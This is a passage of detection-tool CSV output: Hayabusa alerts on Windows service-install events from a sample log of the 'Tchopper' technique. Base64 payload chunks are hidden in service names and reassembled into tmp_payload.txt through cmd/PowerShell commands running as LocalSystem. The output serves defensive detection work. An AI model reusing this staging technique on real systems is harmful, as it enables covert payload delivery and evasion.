start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:13.355 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:13.355 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:14.807 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:14.807 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:14.807 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:16.238 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:16.238 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:16.238 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:17.691 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:17.691 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:17.691 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:19.164 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:19.164 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:19.164 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:20.628 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:20.628 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:20.628 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:22.226 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:22.226 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:22.226 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:23.680 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:23.680 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:23.680 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:25.137 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:25.137 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:25.137 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:26.591 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:26.591 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:26.591 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:28.028 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:28.028 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:28.028 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:29.482 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:29.482 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:29.482 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:30.940 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:30.940 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:30.940 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 